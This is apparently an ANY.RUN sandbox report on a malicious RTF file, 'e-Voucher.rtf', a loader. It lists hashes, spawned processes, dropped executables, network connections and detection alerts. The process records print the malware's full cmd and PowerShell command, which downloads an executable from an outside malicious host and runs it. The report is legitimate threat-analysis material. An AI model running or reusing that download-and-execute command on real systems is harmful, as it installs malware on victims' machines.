analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

e-Voucher.rtf

Full analysis: https://app.any.run/tasks/2a49fdbc-0853-46ac-9181-d4cd8a6676bb
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: July 17, 2019, 12:30:55
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
generated-doc
loader
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

E8FDFC88BD3C8C31E716A1E6F0342EB4

SHA1:

C52F02E1C60FC61677F42DF6536E3772D2266B6F

SHA256:

36D7D6BAADAF4EC191AAEED71FCCD5173BA936865D7C1146931FA58080897E5D

SSDEEP:

12288:uA7yaNnFsDSskEI3f3CPEWlHz4I85iRBsWFM1rW2aO:f75NnFsLfI3fmTlGiRBsWFMwC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3380)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3380)

    • Application was dropped or rewritten from another process

      • calce.exe (PID: 1492)
      • calce.exe (PID: 2784)
      • CHRONE.EXE (PID: 2496)
      • ANDVIDEOSE.EXE (PID: 456)
      • PRNVSLE.EXE (PID: 2240)
      • SVTHOST.EXE (PID: 804)
      • msskype.exe (PID: 576)
      • rundll.exe (PID: 1940)

    • Downloads executable files from the Internet

      • powershell.exe (PID: 2188)

    • Changes the autorun value in the registry

      • calce.exe (PID: 1492)

  • SUSPICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 2292)
      • cmd.exe (PID: 1568)

    • Creates files in the user directory

      • powershell.exe (PID: 2188)
      • powershell.exe (PID: 3304)

    • Application launched itself

      • calce.exe (PID: 2784)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2188)
      • calce.exe (PID: 1492)
      • PRNVSLE.EXE (PID: 2240)

    • Starts Microsoft Office Application

      • calce.exe (PID: 1492)

    • Starts itself from another location

      • calce.exe (PID: 1492)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3380)
      • WINWORD.EXE (PID: 2792)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3380)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

Author: Perfectmoney
LastModifiedBy: MSWord
CreateDate: 2019:07:07 12:19:00
ModifyDate: 2019:07:07 12:19:00
RevisionNumber: 2
TotalEditTime: -
Pages: 1
Words: 49
Characters: 283
Company: diakov.net
CharactersWithSpaces: 331
InternalVersionNumber: 85
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
51
Monitored processes
15
Malicious processes
5
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start drop and start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe calce.exe no specs calce.exe andvideose.exe no specs chrone.exe winword.exe no specs prnvsle.exe svthost.exe no specs notepad.exe no specs rundll.exe no specs msskype.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3380"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\e-Voucher.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2292C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe /c powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://honor-btc.com/calcse.exe','%TEMP%\calce.exe');Start-Process '%TEMP%\calce.exe'C:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2188powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://honor-btc.com/calcse.exe','C:\Users\admin\AppData\Local\Temp\calce.exe');Start-Process 'C:\Users\admin\AppData\Local\Temp\calce.exe'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2784"C:\Users\admin\AppData\Local\Temp\calce.exe" C:\Users\admin\AppData\Local\Temp\calce.exepowershell.exe
User:
admin
Company:
curiosity
Integrity Level:
MEDIUM
Description:
Half-confederate
Exit code:
0
Version:
0.0.4.2
1492"C:\Users\admin\AppData\Local\Temp\calce.exe" C:\Users\admin\AppData\Local\Temp\calce.exe
calce.exe
User:
admin
Company:
curiosity
Integrity Level:
MEDIUM
Description:
Half-confederate
Exit code:
0
Version:
0.0.4.2
456"C:\Users\admin\AppData\Local\Temp\ANDVIDEOSE.EXE" C:\Users\admin\AppData\Local\Temp\ANDVIDEOSE.EXEcalce.exe
User:
admin
Company:
sharp-tasting
Integrity Level:
MEDIUM
Description:
Basset
Version:
1.1.4.4
2496"C:\Users\admin\AppData\Local\Temp\CHRONE.EXE" C:\Users\admin\AppData\Local\Temp\CHRONE.EXE
calce.exe
User:
admin
Integrity Level:
MEDIUM
2792"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DOCUMENT.RTF"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEcalce.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2240"C:\Users\admin\AppData\Local\Temp\PRNVSLE.EXE" C:\Users\admin\AppData\Local\Temp\PRNVSLE.EXE
calce.exe
User:
admin
Integrity Level:
MEDIUM
804"C:\Users\admin\AppData\Local\Temp\SVTHOST.EXE" C:\Users\admin\AppData\Local\Temp\SVTHOST.EXEcalce.exe
User:
admin
Company:
bacteriophagy
Integrity Level:
MEDIUM
Description:
apocopes
Version:
7.2.0.0
Total events
2 833
Read events
2 019
Write events
0
Delete events
0

Modification events

No data
Executable files
7
Suspicious files
4
Text files
1
Unknown types
3

Dropped files

PID
Process
Filename
Type
3380WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRF55D.tmp.cvr
MD5:
SHA256:
2188powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RK3RRLLFBARXU381DPDW.temp
MD5:
SHA256:
2792WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9779.tmp.cvr
MD5:
SHA256:
3304powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KFVF5MKJ6TUENEJHIVY2.temp
MD5:
SHA256:
3380WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$Voucher.rtfpgc
MD5:99EA3DF2A58293CF8ED2E52B7E9F9876
SHA256:93B67EDFAD725B3D01C73B1EE32B05C6A325F083B88A29D4575B2422CB962A2B
2188powershell.exeC:\Users\admin\AppData\Local\Temp\calce.exeexecutable
MD5:80455AF6998E810ED5DADB6F485F2C95
SHA256:FE82A5659C0DFFA5400E266FC39ECB72EEE9FC742EE0CE0D7C09105BAEC49FB3
1492calce.exeC:\Users\admin\AppData\Local\Temp\CHRONE.EXEexecutable
MD5:861AE1579803AD8AEDB8E2D24B881083
SHA256:831791CAB956EEC97532F3547D703D5D12E58A663BF0E29188EC0500B8A9661F
2188powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFe3db0.TMPbinary
MD5:E4D9C442DD447A8FA05F9CFE88FCBB69
SHA256:EDD7D7597C6C79A1DFD3229A1FA23433329B1D8399EB558623FFF948D3BB4036
1492calce.exeC:\Users\admin\AppData\Local\Temp\DOCUMENT.RTFtext
MD5:591C682F25A90469ABABEAD3697EF4F5
SHA256:1FA692B3EF2E8194AC65F5F7C10597AA4A2C9DD0FC1E6ABE6A642263A325C063
1492calce.exeC:\Users\admin\AppData\Local\Temp\PRNVSLE.EXEexecutable
MD5:CF34E9E4DC2F8BA0151D72A13C8E7A43
SHA256:5D3AB8C28CB52DCF04968D45332F22A4F6C4416E2378AD149181F332DB687D63
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
4
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3304
powershell.exe
GET
192.99.174.127:80
http://300bitcoincash.com/calcs.exe
CA
malicious
2188
powershell.exe
GET
200
198.50.193.201:80
http://honor-btc.com/calcse.exe
VI
executable
1.86 Mb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2496
CHRONE.EXE
192.253.255.182:1518
Zenlayer Inc
RU
malicious
2240
PRNVSLE.EXE
192.253.255.182:1518
Zenlayer Inc
RU
malicious
2188
powershell.exe
198.50.193.201:80
honor-btc.com
OVH SAS
VI
suspicious
3304
powershell.exe
192.99.174.127:80
300bitcoincash.com
OVH SAS
CA
malicious

DNS requests

Domain
IP
Reputation
honor-btc.com
  • 198.50.193.201
suspicious
300bitcoincash.com
  • 192.99.174.127
unknown

Threats

PID
Process
Class
Message
2188
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2188
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
Process
Message
PRNVSLE.EXE
OutputDebugStringA
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
e-Voucher.rtf